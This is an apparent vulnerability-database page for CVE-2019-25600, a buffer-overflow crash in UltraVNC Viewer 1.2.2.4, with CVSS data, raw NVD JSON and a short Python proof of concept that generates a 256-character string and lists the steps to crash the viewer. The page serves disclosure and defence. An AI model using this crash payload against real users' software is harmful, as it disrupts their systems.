Security Vulnerability Report
CVE-2019-25600 CVSS 6.5 MEDIUM

Published: 2026-03-22 14:16:27
Last Modified: 2026-04-16 16:19:51

Description

UltraVNC Viewer 1.2.2.4 contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized string to the VNC Server input field. Attackers can paste a malicious string containing 256 repeated characters into the VNC Server field and click Connect to trigger a buffer overflow that crashes the viewer.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

UltraVNC Viewer 1.2.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2019-25600 Proof of Concept
# This script generates a payload to crash UltraVNC Viewer 1.2.2.4


def generate_dos_payload():
    # The vulnerability is triggered by a string of 256 repeated characters
    payload = "A" * 256
    return payload


if __name__ == "__main__":
    # Generate the malicious string
    crash_string = generate_dos_payload()
    print(f"[*] Payload generated: {len(crash_string)} characters")

    try:
        # Imported inside the try block so a missing library reaches the handler below
        import pyperclip

        # Copy payload to clipboard for simulation
        pyperclip.copy(crash_string)
        print("[*] Payload copied to clipboard.")

        print("[+] Reproduction steps:")
        print("1. Open UltraVNC Viewer 1.2.2.4")
        print("2. Paste the payload into the 'VNC Server' input field")
        print("3. Click 'Connect' button")
        print("4. The application should crash due to buffer overflow")
    except ImportError:
        print("[-] Error: pyperclip library is missing.")
        print(f"Payload: {crash_string}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25600", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:27.343", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "UltraVNC Viewer 1.2.2.4 contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized string to the VNC Server input field. Attackers can paste a malicious string containing 256 repeated characters into the VNC Server field and click Connect to trigger a buffer overflow that crashes the viewer."}, {"lang": "es", "value": "UltraVNC Viewer 1.2.2.4 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes bloquear la aplicación al proporcionar una cadena de caracteres excesivamente larga al campo de entrada del servidor VNC. Los atacantes pueden pegar una cadena maliciosa que contenga 256 caracteres repetidos en el campo del servidor VNC y hacer clic en Conectar para desencadenar un desbordamiento de búfer que bloquea el visor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46702", "source": "[email protected]"}, {"url": "https://www.uvnc.com/", "source": "[email protected]"}, {"url": "https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ultravnc-viewer-denial-of-service-via-buffer-overflow", "source": "[email protected]"}]}}